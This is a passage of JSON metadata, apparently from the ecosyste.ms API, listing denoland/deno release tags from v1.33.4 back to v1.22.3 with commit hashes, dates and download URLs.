anifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/ta